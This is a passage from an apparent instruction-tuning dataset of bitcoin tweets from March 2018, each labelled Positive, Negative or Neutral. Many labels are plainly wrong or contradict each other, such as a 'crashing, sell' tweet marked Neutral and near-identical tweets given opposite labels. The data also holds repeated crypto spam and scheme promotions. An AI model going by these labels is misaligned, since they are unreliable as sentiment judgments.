"input": "@cz_binance Bitcoin is crashing! sell Sell SELL!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Shorting bitcoin until downtrend is confirmed broken (not a joke)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@bitcoinyuri @Blockstream Sorry, no longer interested in Bitcoin.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Litecoin IMHO short term. Bitcoin is long term. The higher you are, the farther you have to fall.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 0000000000000000005148b477c1afed7f77e76e5cf192d9b5bbb8c1804e1c6f mined at height 514754.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 03:58:01 2018 (1:15)\nUSD : 8425.35\nWght: 0.42\nBlk#: 514754\nSize: 6.3 KB\nTXs: 22\nPool: 172 (0.1 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@bittybitbit86 Yeah it\u2019s ridiculous. Even worst case scenario that it gets shut down barely makes a dent in bitcoin future adoption", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "it's called bitcoin because it's only worth a lil bit", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Footy_Cash bitcoin\uff1f", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@APompliano Bitcoin and litecoin will be used. With smart contract and there technology there no limit. \u26a1\ufe0f\ud83d\ude80", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Valores | dolar R$3.3019 | BITCOIN(MCDTBC) R$30498.98000000 | BITCOIN(BLCHAIN) R$27938.63 | LITECOIN(MCDTBC) R$577.10000000", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@NischalShetty Correction : Bitcoin is backed by math", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio If they could have than Bitcoin would of been shut down long time ago !", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@DrewPflaum @BITCOlNCASH @BitcoinCashFund @BCHmeetups Sorry, not interested in Bitcoin Cash.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio #BITCOIN is KING all day long.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "You can buy 1995 Big Macs with 1 Bitcoin \u2b07\ud83c\udf54", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bad news: Bitcoin on the decline.\nCurrent Rate: 8428.81 USD = 1 BTC", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ #1, Bitcoin with unit price of $8,451.49, market cap of $143,120,802,387 (44.31%), and 24 hr vol. of $5,441,800,000 (37.52%)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Mar 22, 2018 08:00PM #Bitcoin Price:\nUSD 8695.66 | EUR 7048.24 | JPY 929250.00", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin - BTC\nPrice: $8,444.87\nChange in 1h: -2.2%\nMarket cap: $143,008,485,623.00\nRanking: 1\n#Bitcoin #BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current BTC Dominance: 44.31% #Bitcoin #Altcoin #Cryptocurrency", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin:$8444.87\nEthereum:$516.81\nBitcoin Cash:$970.829\nLitecoin:$158.655\nRipple:$0.635307\nIOTA:$1.27057", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I wish I could drop acid as hard as the price of Bitcoin.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8451.49 / 6859.651\u20ac\n1 bitcoin-cash = $970.829 / 787.973\u20ac\n1 ethereum = $516.85 / 419.501\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Average Bitcoin market price is: USD 8,434.24, EUR 6,841.88", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "2018-03-23 03:00 UTC Bitcoin Price: 8422.79 USD", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "How could bitcoin be affected by a trade war?\n\nThe only trade war bitcoin is having right now is with the moon.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@NischalShetty #Bitcoin is backed by math", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Cryptopia will be listing ColossusCoinXT ( $COLX) #cryptocurrency #blockchain #bitcoin #crypto #btc #ico #eth #xrp #trading #CryptoNews", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 #BTC (#Bitcoin) quotes:\n$8424.70/$8437.59 #Bitstamp\n$8430.50/$8439.20 #Kraken\n\u21e2$-7.09/$14.50\n$8376.90/$8461.10 #Coinbase\n\u21e2$-60.69/$36.40", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Top 6 BTC/USD Exchange Orderbooks: Resistance til $8700:$24.2M; Support til $8200:$43.5M $BTC $BTCUSD #bitcoin #orderbook #markets #crypto", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin Price 8419.00 USD via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@NoTimeToSearch @cz_binance \ud83d\ude02\ud83d\ude02\ud83d\ude02people have such a small vision. How can you not see what bitcoin and blockchain technology is capable of.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#XEM Price is 0.00003329 (-0.00000013) #BTC / 0.279434 (-0.00121) #USD. Market rank is 13. #nem #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#SUB Price is 0.00004690 (-0.00000024) #BTC / 0.393709 (-0.00216) #USD. Market rank is 115. #substratum #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#DASH Price is 0.0471977 (-0.00010940) #BTC / 396.804 (-4.38800) #USD. Market rank is 12. #dash #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#EOS Price is 0.00078357 (+0.00000543) #BTC / 6.58764 (+0.05346) #USD. Market rank is 7. #eos #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC hourly update\n$8443.18 | -0.0203%\ud83d\udcc9\n$BTC #BTCUSD #Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#ADA Price is 0.00002267 (+0.00000000) #BTC / 0.190569 (+0.00023) #USD. Market rank is 6. #cardano #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "once bitcoin dominance hits around 50%+ that\u2019s when the market will reverse and get health. calling it rn #ALTSEASONCOMEBAAAACCCCKKKK", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Dear @Snowden and @coinbase, Please #STFU. Sincerely, all #Crypto investors. #xrp #ripple #bitcoin #VergeFam #tron #trx", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin has inherent value as a decentralized currency but its current valuation is a bubble waiting to burst. #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin $8,429.15 v #BitcoinCash $968.57 (BTC/BCH 8.7), Avg Transaction fee for #Bitcoin ~$1.32 v #BitcoinCash ~$0.10 - 2018/03/23 12:00JST", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8419.00", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "once bitcoin dominance hits around 50%+ that\u2019s when the market will reverse and get healthy. calling it rn #ALTSEASONCOMEBAAAACCCCKKKK", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@benshapiro What are your thoughts on Bitcoin/Litecoin and other crypto currencies?", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ledgerstatus Well said! Bitcoin is still young in financial terms, though growing quickly!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Have we hit rock bottom in crypto yet?\n\n#Crypto #Blockchain #Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8419.00.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of #Bitcoin is $8419.00", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@blackwidowgrl You\u2019re welcome sweetie and lol on bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@benshapiro What are you thoughts on Bitcoin/Litecoin and other crypto currencies?", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Good job #bitcoin #BTTC2018", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The price of Bitcoin is $8419.00 right...now. \ud83d\udd51", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8419.00 \u201cLike\u201d if thats good for you and \u201cretweet\u201d if thats not good for you #bitcoin #btc #bitcoinprice", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin is currently tired of going into space and visiting the moon.\n\nSeems like the Earth's core is a new destination. \u2668\ufe0f#BTC $BTC", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 04:03:18 2018 (5:17)\nUSD : 8407.19\nWght: 0.42\nBlk#: 514755\nSize: 610.1 KB\nTXs: 822\nPool: 83 (0.0 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 0000000000000000004c95477f37ba7d0d5501f8476fb07720f81d41ae1c1ced mined at height 514755.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@TeaPainUSA Bitcoin regs?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC $8444.87 Down -$198.43 -2.35% in the last hour #bitcoin #bitsmart", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BITCOIN IS AT 8407.1875", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Cointelegraph Sorry, no longer interested in Bitcoin.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@gavinandresen Are you at the Satoshi Vision Bitcoin Cash conference?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Bitcoin Let's wait and see if a project supported by censored forum only could have any future.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "seungri talking about bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@maximalistsnews More Bitcoin is More!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "THE MOST INNOVATIVE AND LUCRATIVE WAY TO EARN BITCOIN\nJOIN BITCLUB NETWORK!!!!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Hell_HasCome Buy bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "help \nI only have $70\n\nI dont want to die\n\nbitcoin addless \n1A5WPUwEBm1sGzpKh4CpT5W2hfKEVcG4hu", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 04:07:13 2018 (3:55)\nUSD : 8412.55\nWght: 0.42\nBlk#: 514756\nSize: 253.7 KB\nTXs: 448\nPool: 18 (0.0 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Blockchain_Jay Bitcoin, Cardando, Ripple, EOS, BAT, NEO, Enjin, WAX.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "OMG Bitcoin is the new vaping", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 00000000000000000032e872239890eb7c362c008137845b7dcefbdb66a4e7ce mined at height 514756.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "$SANUSD entering oversold zone on interval 60m #cryptocurrency #trading #bitcoin #crypto #technicalanalysis", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "fifth speaker @Satoshis_Vision @vermorel \nTerabyte blocks :)\n\n\"bandwidth is the most solved problem of #bitcoin.\"", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Thank you to the @NODEfather for this opportunity and thank you to the bitcoin community for letting me be your champion.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@charliebxrnes bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8453.59 / 6861.356\u20ac\n1 bitcoin-cash = $972.231 / 789.111\u20ac\n1 ethereum = $517.53 / 420.054\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin BTC Current Price:\n$8.453,590\n1 Hour: -2.02 % | 24 Hours: -6.81 % | 7 Days: 2.73 %\n#btc #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@KingRippleXRP Bitcoin to $5000 soon", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@coindesk Binance doesn't even sell bitcoin for JPY...", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "fifth speaker @Satoshis_Vision @vermorel \nTerabyte blocks :)\n\n\"nowadays backing #bitcoin has improved, by quite a lot.\"", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@GreedPositive @ThrowingBugs @Bitcoin Reported for abusing twitter to spread propaganda for BSCore.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@TechnicalCrypto That reinforces the argument to me that bitcoin should correlate.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@SallyMayweather @theemrsmcafee This is why we need #bitcoin as well", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@rogerkver @Falkvinge @Falkvinge is very clever.\n\nBCH is REAL bitcoin.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8413.86", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@AP4Liberty And sound money. Buy #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@whalecalls \nShould we get ready for round 2?\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@BigCheds Anynews on bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@RealKidPoker Bitcoin millionaire", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CryptoWaffles damn liked this thinking you were joking about bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Don't be such a bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The #Bitcoin pizza is worth $85,360,325 today. (-7% from yesterday)", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Bitcoin hands down", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@joerogan What about Bitcoin money???", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current Bitcoin Price = $9425.27 --- Includes Sum of Forks, Core $8402.00 (89.14%) + Cash $966.23 (10.25%) + Gold $57.04 (0.61%)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Apple Bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The current price of Bitcoin is $8451.29.\nThe current price of BCash is $972.231, or 0.115678 BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@mattmilsap @Bitcoin @Satoshi_N_ I really doubt if you are mocking #BCore altcoin supporters by doing so.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@sic_null @SpoonGuru21 @rogerkver @Falkvinge Nope, BTC stole Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio always bitcoin it does control the market. but Etherum or other powerful infrastructures like Neo", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Zuckerberg vs. the Winklevoss twins. Who\u2019s the loser now? The identity seller or the billionaire bitcoin twins.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "In just 73 minutes a day you can reinvigorate your career. #bitcoin #clickbait", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 04:16:23 2018 (9:10)\nUSD : 8407.42\nWght: 0.42\nBlk#: 514757\nSize: 561.7 KB\nTXs: 1016\nPool: 61 (0.0 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin Cash BCH Current Price:\n$972,231\n1 Hour: -2.89 % | 24 Hours: -8.03 % | 7 Days: 4.92 %\n#bch #bitcoin cash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 000000000000000000366f5650d6ba3cf62682e44f541f9224004b8af7d25a5c mined at height 514757.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Retweet if you agree that Bitcoin is the new gold #bitcoin #bitcoins #bitcoinisgold #bitcoinworld #bitcoinnews", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Cryptos_Aus As long as it's not the fraudster bitcoin-fund-manager ?", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New stable coin idea: Everything is priced in #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC-HMQ AskRate: 0.00001119 #Bittrex #HMQ $HMQ #Humaniq #altcoin #crypto #bitcoin\n \u2665 FOLLOW for PROFIT", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8440.05 / 6850.366\u20ac\n1 bitcoin-cash = $970.851 / 787.991\u20ac\n1 ethereum = $517.001 / 419.624\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Don't let the #Binance #FUD today distract you. #Bitcoin $BTC will bounce back.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@syd_viciously Bitcoin was created by the CIA?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Terabyte blocks - 50 txns a day for 10 billion people. Bitcoin can scale on chain. No layer 2 needed.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@RichardHeartWin However, bitcoin is going way lower regardless..", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Whenever I contemplate whether or not to sell Bitcoin, I think of the \"Goodbye moon man\" song from Rick and Morty.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin is barely even fun anymore. $XBT BTC", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CoinStructive #shirtgate Hey @ellypriZeMaN we need you more than ever. ~Bitcoin Belle \ud83c\udf37", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@LandlordRescue I\u2019m inventing a better bitcoin so should be good to go!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@LoganPaul watch out for the death cross in ur bitcoin investment ,look it up check it out protect ur money", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Dow Jones going down.\nBitcoin was supposed to shield.\nFucking suits- leave us!\n\n$BTC #crypto #haiku", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "our uber driver has his business card on the dash and it says \u201cbitcoin miner\u201d as his job title", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ProfFaustus Bitcoin is not a philosophy...... BCH is not Bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@itsmelissabrown remember how early they were on writing about bitcoin??? nuts in retrospect", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@JakeNTech New options: \n1. Water Cooled Laptop, WetCoin\u2122!\n2. Two Computa, Two BitCoin!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "All in on Diet Bitcoin. Escobars brother guarantees profit lol", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "50k tokens reserved for private investors\n\n#Ethereum #ZOMBI #ZOMBIcoin #Bitcoin #ICO", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The Thrive Labs Team is launching a revolutionary Premium Decentralized Advertising Marketplace.\n#thrive #ico #ethereum #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I hate ween people exploit things and ruin the fun for everyone. First Youtube, now bitcoin/cryptos \ud83d\ude27\ud83d\ude27", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I see all the Bitcoin ppl stopped talkin \ud83d\ude2d", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "wat if unified Korea becomes the next cuba & disrupts global power um Bitcoin n stuff", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin:$8431.5\nEthereum:$515.604\nBitcoin Cash:$966.799\nLitecoin:$158.548\nRipple:$0.631444\nIOTA:$1.26867", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8431.5 / 6843.426\u20ac\n1 bitcoin-cash = $966.799 / 784.702\u20ac\n1 ethereum = $515.604 / 418.489\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "One Bitcoin now worth $8413.81@bitstamp. High $9055.330. Low $8342.000. Market Cap $142.481 Billion #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "One Bitcoin now worth $8413.81@bitstamp. High $9055.330. Low $8342.000. Market Cap $142.481 Billion #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@welovefaucet I have the same problem in both We Love Bitcoin and Play Bitcoin.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#SUB Price is 0.00004617 (-0.00000073) #BTC / 0.385999 (-0.00771) #USD. Market rank is 116. #substratum #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin>>>>>", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#EOS Price is 0.00078017 (-0.00000340) #BTC / 6.52226 (-0.06538) #USD. Market rank is 7. #eos #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#XEM Price is 0.00003301 (-0.00000028) #BTC / 0.275969 (-0.00347) #USD. Market rank is 13. #nem #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#ADA Price is 0.00002258 (-0.00000009) #BTC / 0.188787 (-0.00178) #USD. Market rank is 6. #cardano #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#DASH Price is 0.0481372 (+0.00093950) #BTC / 402.431 (+5.62700) #USD. Market rank is 11. #dash #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "This couple loves bitcoin so much that they decided to have a bitcoin themed wedding. Most of their guests gave them bitcoin as a gift!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Hello humans, #Bitcoin is currently around $8428.55 as of Thu Mar 22 22:31:11 CDT 2018", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8430.81", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Bitcoin still. I've been stockpiling and putting it in my bot to make daily scalping trades", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@lister_lester He wants to buy the bitcoin dip. : )", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Alfredo_THC make bitcoin and the dow go back up", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The short way was to help, Google and Facebook went for the money. Plan B, just go through you\ud83d\udd25\n\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CNBC Would be nice to see an after Pic when bitcoin crashes", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 04:32:12 2018 (15:49)\nUSD : 8416.59\nWght: 0.42\nBlk#: 514758\nSize: 736.0 KB\nTXs: 1658\nPool: 75 (0.0 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 00000000000000000004d1d76f3a8931d87ad736d36fd62c733e05cf56d9274e mined at height 514758.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "So @Ania_Nimbla you like #Bitcoin & #Crypto Cool \ud83d\udc4d\ud83c\udffb Great to connect Ania much appreciated", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@afaqshah @PhilakoneCrypto Wishing ill upon bitcoin, rude", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#bitcoin buy now 8387 good price for enter", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@EstherKuKu Then redeem your points for Bitcoin and boom goes the dynamite!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": 